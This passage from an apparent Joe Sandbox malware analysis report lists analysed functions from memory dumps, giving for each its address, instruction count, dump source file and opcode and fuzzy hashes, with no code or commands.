                                                                                        • Instruction Fuzzy Hash: 33D1F330B0EB0A8FE378DB68D4A557977E1FF44310B1505BEC48EC76AADB29B9428741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8CE21 Relevance: .4, Instructions: 412COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 817a6545e29eaebecaa32c3099b9348ac626f87482897687c11cb4bc52b1f031
                                                                                        • Instruction ID: 5fdb131f44dabd29a59400f492541aaec94ba0a85907b9d6f50b4f81c5353462
                                                                                        • Opcode Fuzzy Hash: 817a6545e29eaebecaa32c3099b9348ac626f87482897687c11cb4bc52b1f031
                                                                                        • Instruction Fuzzy Hash: 6AE1DF30A1EF0A8FE369DB68D4A057977A1FF44310B11457ED48AC76A2DF39B9428781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC73FA1 Relevance: .4, Instructions: 410COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 779839aacd938644027b01b48cf8c2bd6a65354fe66c6c27e649575e3dfc913b
                                                                                        • Instruction ID: 83500fc47a36fb7e386afb7fb093b6079a72f61d4d7c511c49186fd36aea79c0
                                                                                        • Opcode Fuzzy Hash: 779839aacd938644027b01b48cf8c2bd6a65354fe66c6c27e649575e3dfc913b
                                                                                        • Instruction Fuzzy Hash: FFD1E030A1EB0A9FE369DB78C4E157D77E1FF44300B11457EC49EC76A2DA29B9428781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9B631 Relevance: .4, Instructions: 407COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: acacd74fdb39eba5aa8bb8a73dda14788af263fc1ae24bf0a7bede170ff08838
                                                                                        • Instruction ID: 78865a6297b826a12c31510e9479c8632c26a8f15ccc0478d113e8f21dfc40aa
                                                                                        • Opcode Fuzzy Hash: acacd74fdb39eba5aa8bb8a73dda14788af263fc1ae24bf0a7bede170ff08838
                                                                                        • Instruction Fuzzy Hash: 19D1F430B1EB4A9FE378DB78C4A057977E1FF48300B11457EC04AC76AADA29B941C751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9A5EF Relevance: .4, Instructions: 407COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ee2e71f2e97269d5f32b35602d3f3766e667c916f1a82a905d5d34a5b129460d
                                                                                        • Instruction ID: 701d2a541dd1524e14dfcf47fbe89a0ba7328a36f19f702d7dabfaf45993fa80
                                                                                        • Opcode Fuzzy Hash: ee2e71f2e97269d5f32b35602d3f3766e667c916f1a82a905d5d34a5b129460d
                                                                                        • Instruction Fuzzy Hash: 6CE1D13461955A8FEB5CCF28C4E06B837A1FF45310B5241BDD85ACB69FDA38E981CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC78B98 Relevance: .4, Instructions: 363COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd94b930525e402d594d1061a448b5a816e2e1acf2927d31a847fd9791d9d8f8
                                                                                        • Instruction ID: 1ffe51d7388febdbd273baffa62ae1927004305b00c930dfa8735302bf07f564
                                                                                        • Opcode Fuzzy Hash: cd94b930525e402d594d1061a448b5a816e2e1acf2927d31a847fd9791d9d8f8
                                                                                        • Instruction Fuzzy Hash: B1D1C23061A54A8FEB58CF69C0E05B837A1FF54310B5546BDD94BCB69ACB38F981CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC72F7F Relevance: .3, Instructions: 337COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb0fbcf11163123766dff410e557012737b739617c5a908de1ac0f58fafad6b2
                                                                                        • Instruction ID: 42bb41779885bd711acba4d33e7b814bc52ab02dd9340006f1bf8788ffb58030
                                                                                        • Opcode Fuzzy Hash: fb0fbcf11163123766dff410e557012737b739617c5a908de1ac0f58fafad6b2
                                                                                        • Instruction Fuzzy Hash: 9BC1193061A5468FEB2DCF68C0E05B837A1FF85301B5545BDD89B8B69BDA38F642CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8BDFF Relevance: .3, Instructions: 337COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf915350f7bd8d36d69803a945a0eed0bfd3b16f2b90e9c4c43acb7f96a08b24
                                                                                        • Instruction ID: 70bf92e080de0f68323f07362b5a05dc4276f4d6cb2c62fb7bdd606b70c8cae2
                                                                                        • Opcode Fuzzy Hash: bf915350f7bd8d36d69803a945a0eed0bfd3b16f2b90e9c4c43acb7f96a08b24
                                                                                        • Instruction Fuzzy Hash: 6DC1F73061994A8FEB1DCF68C0E05B577A1FF45305B5546BDC85B8B69BCA38F981CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9A60F Relevance: .3, Instructions: 334COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c417e95eb53d5e95511b3084fb9c9ffad8cf3d61587e881aba1ba2dafb4fb845
                                                                                        • Instruction ID: 4fb993d12e38f58cd14b8fc9652059db15877f1a723360d1f46dd7827f6a4198
                                                                                        • Opcode Fuzzy Hash: c417e95eb53d5e95511b3084fb9c9ffad8cf3d61587e881aba1ba2dafb4fb845
                                                                                        • Instruction Fuzzy Hash: 1CC1E13461955A8FEB2DCF64C0E05B937A0FF45310B5245BDE85A8B69FDA38F981CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC78BBF Relevance: .3, Instructions: 333COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4ba300064cf045c937c9d17173a4a347176e959fe14e1a6500d903f9dad4b59
                                                                                        • Instruction ID: f255e2c1d9792812f29da77fc15663c3da88ef60ba51134c9bb70585fa59b90f
                                                                                        • Opcode Fuzzy Hash: f4ba300064cf045c937c9d17173a4a347176e959fe14e1a6500d903f9dad4b59
                                                                                        • Instruction Fuzzy Hash: 7DC1E13061A54A8BEB1DCF65C0E05B937A1FF45310B5546BDD94B8B69BCB38F581CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9496F Relevance: .3, Instructions: 332COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b7ca8000f23a712626a09bf62cd0e2182ddbadcd7524da1ed24759b9ce88841
                                                                                        • Instruction ID: a8ce6fba422003abd6c19e737be0b65a8af65d6e7809d98c2ebf471fb914b0ba
                                                                                        • Opcode Fuzzy Hash: 5b7ca8000f23a712626a09bf62cd0e2182ddbadcd7524da1ed24759b9ce88841
                                                                                        • Instruction Fuzzy Hash: B9C1CF3061A54A9FFB2DCF64C0E05B937A1FF45310B5546BDC89A8B69FCA38E581CB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC94202 Relevance: .3, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3aa8e41669cf6c1616fc2e9d4145dabed2f12b9593fb804c0e30f9b1ece9e54b
                                                                                        • Instruction ID: a19a8423dce64af9b9464f658c9534959f6b8d07be112d51a27984104913a220
                                                                                        • Opcode Fuzzy Hash: 3aa8e41669cf6c1616fc2e9d4145dabed2f12b9593fb804c0e30f9b1ece9e54b
                                                                                        • Instruction Fuzzy Hash: 02C1C53071DA4A9FE769DB68C0A06A8B7A1FF58300F5541BDD04EC7A9ADB38B951C780
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC72812 Relevance: .3, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2eed1e18ec8524034ff1e306de56608cf364da151fad13718a62d98132c5dd61
                                                                                        • Instruction ID: 971cf8f6b9b4a0247c99d254653339f769e6c652526d7cd736f4ee9b71a222f8
                                                                                        • Opcode Fuzzy Hash: 2eed1e18ec8524034ff1e306de56608cf364da151fad13718a62d98132c5dd61
                                                                                        • Instruction Fuzzy Hash: 25C1D630B1AA4A8FE759DBB8C0E06A8B7A1FF59310F55417DC04ECBA96DB24F951C780
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC99EA2 Relevance: .3, Instructions: 324COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b53948ec35425cff4091863cfadc164764cf845f364fe42cffe65a506a874bf
                                                                                        • Instruction ID: c596e27bd00ae45b144bb99cb6acb43b037b345de1db0c17ab3413b6038d62c8
                                                                                        • Opcode Fuzzy Hash: 2b53948ec35425cff4091863cfadc164764cf845f364fe42cffe65a506a874bf
                                                                                        • Instruction Fuzzy Hash: 27C1D630B0EA4E8FF759DB68C4A56B8B7A1FF54300F554179D04EC7A9ACB28B951C780
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC91BCF Relevance: .3, Instructions: 318COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b422e78dbf5c1b5d210fa226c90562111ecb880e94ea4e99af8c6610763b7589
                                                                                        • Instruction ID: 02493d74753c8226ddb4465974d2c88cbcc998f8baa6d17979002b05a743ce5f
                                                                                        • Opcode Fuzzy Hash: b422e78dbf5c1b5d210fa226c90562111ecb880e94ea4e99af8c6610763b7589
                                                                                        • Instruction Fuzzy Hash: CF316802F0F6CB6AF375A6B8543B0FC7B002F15764F6A01B6D49D8A1EBCD0D2A409381
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC7BA47 Relevance: .3, Instructions: 307COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe5a1ee4f277d1f20e89faa97a63fe545a77f47cfa9764424690ab7627ec7652
                                                                                        • Instruction ID: 5906e96f50cebabf36665acf6bbd481d15c695cf03b710e82fc07114db5079f7
                                                                                        • Opcode Fuzzy Hash: fe5a1ee4f277d1f20e89faa97a63fe545a77f47cfa9764424690ab7627ec7652
                                                                                        • Instruction Fuzzy Hash: 5D21C102F0E19B8AE33566B928B91FC3A50DF55325F2A41BBE0DD8B1E6DC0C26415386
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC701D1 Relevance: .3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91a9833d1608a4a83c1fc0a1b5aebfdecd06fa454d944bd2fef58b5e1cb2e26e
                                                                                        • Instruction ID: a45f0805aefbef75677422472f0612b1b3ec1d1d9a77c5f5187e03166bd3fe67
                                                                                        • Opcode Fuzzy Hash: 91a9833d1608a4a83c1fc0a1b5aebfdecd06fa454d944bd2fef58b5e1cb2e26e
                                                                                        • Instruction Fuzzy Hash: C221E412F0F29B8BFE7556F924B11BC2650DF44B66F2A01B7D49D8B0E3DC0C2A415781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC89057 Relevance: .3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4fcfb780e09f6824ad3b2700fd806ac64a8998031554c1d39b6c1a2b84e73a33
                                                                                        • Instruction ID: c2f1cb4bb1486eedf2132f486e47fa4f4ddeeac4b7e2f914d552e29d86c5da6b
                                                                                        • Opcode Fuzzy Hash: 4fcfb780e09f6824ad3b2700fd806ac64a8998031554c1d39b6c1a2b84e73a33
                                                                                        • Instruction Fuzzy Hash: FC21B602F0F99F86F73452F828395BC36405F56227F1A12BAD65D8E0F7DCAC2A419386
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC91BF7 Relevance: .3, Instructions: 296COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa129be16daced2f74413aeeabab5ec2bc043829964d27955c0ab5483bbde3e1
                                                                                        • Instruction ID: 2c0e060fb5d8572f337e062f68576444e11dd4d638bd9fe23625b9647c9070be
                                                                                        • Opcode Fuzzy Hash: aa129be16daced2f74413aeeabab5ec2bc043829964d27955c0ab5483bbde3e1
                                                                                        • Instruction Fuzzy Hash: 82210202F0F5DBAAF37592B9183B0BC7A402F55724F5A02BBD49D8A1EBCC082A414392
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC70207 Relevance: .3, Instructions: 296COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef16bd4718737a5c4330f77c1e3dadcd481c3dad16a84c2a55ede4e5840b9fc4
                                                                                        • Instruction ID: f086f73a49c6edb137f261041292702d5d6a2bb81b78a4faa5dff0c12b85c97c
                                                                                        • Opcode Fuzzy Hash: ef16bd4718737a5c4330f77c1e3dadcd481c3dad16a84c2a55ede4e5840b9fc4
                                                                                        • Instruction Fuzzy Hash: E421F712F0F29B8BFB7996F928B15FC2A50DF14A66F2A01B7D09D8B0E3CC0829454791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC701D7 Relevance: .3, Instructions: 294COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67c302c317ebb85c0821bfe6cac6b868bd626439b5babced9af55baccf7d2155
                                                                                        • Instruction ID: 1c7fd4a1040b01b84044a8f5f6fa86cd517d56cbb1ef110462d5ec064fb4c2f7
                                                                                        • Opcode Fuzzy Hash: 67c302c317ebb85c0821bfe6cac6b868bd626439b5babced9af55baccf7d2155
                                                                                        • Instruction Fuzzy Hash: 5221B312F0F28B8BFE7956F928B11BC1A40DF15B66F2A11B7D49D8B0E3DC082A455792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC993D6 Relevance: .3, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e66115b1f87b7903cfe145b7039bb8acbf21a53ada23b904aaa29ee04fb5592f
                                                                                        • Instruction ID: 6c450b6c7d1a24b90e19cad4cc742b99fceb2a006a1d179883fb54df3b0a5230
                                                                                        • Opcode Fuzzy Hash: e66115b1f87b7903cfe145b7039bb8acbf21a53ada23b904aaa29ee04fb5592f
                                                                                        • Instruction Fuzzy Hash: 10813831B0E70A4FF7799AB8946907D77E0EF95310B16017ED08FC32AADE69B9028751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC71D56 Relevance: .3, Instructions: 266COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85c4c190e97f674d3c448dd5a783fa8cb28890e1118e0cceece6d9ec1739115f
                                                                                        • Instruction ID: 9ff6204617066cf6b33f5872c5c36b15355b32d33912855e00a416e3dc1ba571
                                                                                        • Opcode Fuzzy Hash: 85c4c190e97f674d3c448dd5a783fa8cb28890e1118e0cceece6d9ec1739115f
                                                                                        • Instruction Fuzzy Hash: 60814931B0E74A8FE3799B7884A54BD77E0EF55310B16057ED48EC31A3DE29BA028781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC93746 Relevance: .3, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 25013b9c836f0351a2130cf3d065f418dcb86440019c6e00eed3bdf273014486
                                                                                        • Instruction ID: 635dd2182d0fce57577af615f22198644aee48aa97707b1a5f72de986d56f388
                                                                                        • Opcode Fuzzy Hash: 25013b9c836f0351a2130cf3d065f418dcb86440019c6e00eed3bdf273014486
                                                                                        • Instruction Fuzzy Hash: D1812431B0EA4A4BF3399AB894651BD77E0EFC5310B16017ED09FC35A6DB29B9028791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC7B6F9 Relevance: .2, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e3fa86fc05e3b090d4989d8baa648ac511ccbd2994aec529f480bc4089c2c7a
                                                                                        • Instruction ID: 72612583fe061c9411f28a7796b37ebe67932be52a99caebc9d5855c3fb831fe
                                                                                        • Opcode Fuzzy Hash: 6e3fa86fc05e3b090d4989d8baa648ac511ccbd2994aec529f480bc4089c2c7a
                                                                                        • Instruction Fuzzy Hash: D0711A35B0E54D4FE778DA7888B65BD37D0FF48310B1602B9D09EC75B2DE18AA068791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC97829 Relevance: .2, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: eaa4f451b322f8e5f14a071182d7679569a0da7f2b5160c4a36492a5e093e499
                                                                                        • Instruction ID: fb10ab404decb9fe8abeebce6aa60ccb87f792bc6ff9c51a9b487a23fe26bea9
                                                                                        • Opcode Fuzzy Hash: eaa4f451b322f8e5f14a071182d7679569a0da7f2b5160c4a36492a5e093e499
                                                                                        • Instruction Fuzzy Hash: 7971F635B0F54E4FF778DA6888665BC37D0FF44310B1602BAD0AEC75B6DB18AA168681
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC88D09 Relevance: .2, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 08f4180b5450467ea463dd3e1250332a1a764c55a77a46fc3f2d28e6f8fa7e04
                                                                                        • Instruction ID: 16dd505fca0cb9219c4a91eede5ca34a00b368ec7f80d937cade8dda14221bef
                                                                                        • Opcode Fuzzy Hash: 08f4180b5450467ea463dd3e1250332a1a764c55a77a46fc3f2d28e6f8fa7e04
                                                                                        • Instruction Fuzzy Hash: B8714A35A0ED4E8FE778DB6888665BC73D1FF54311B120279D09ED79B2DE38A9068381
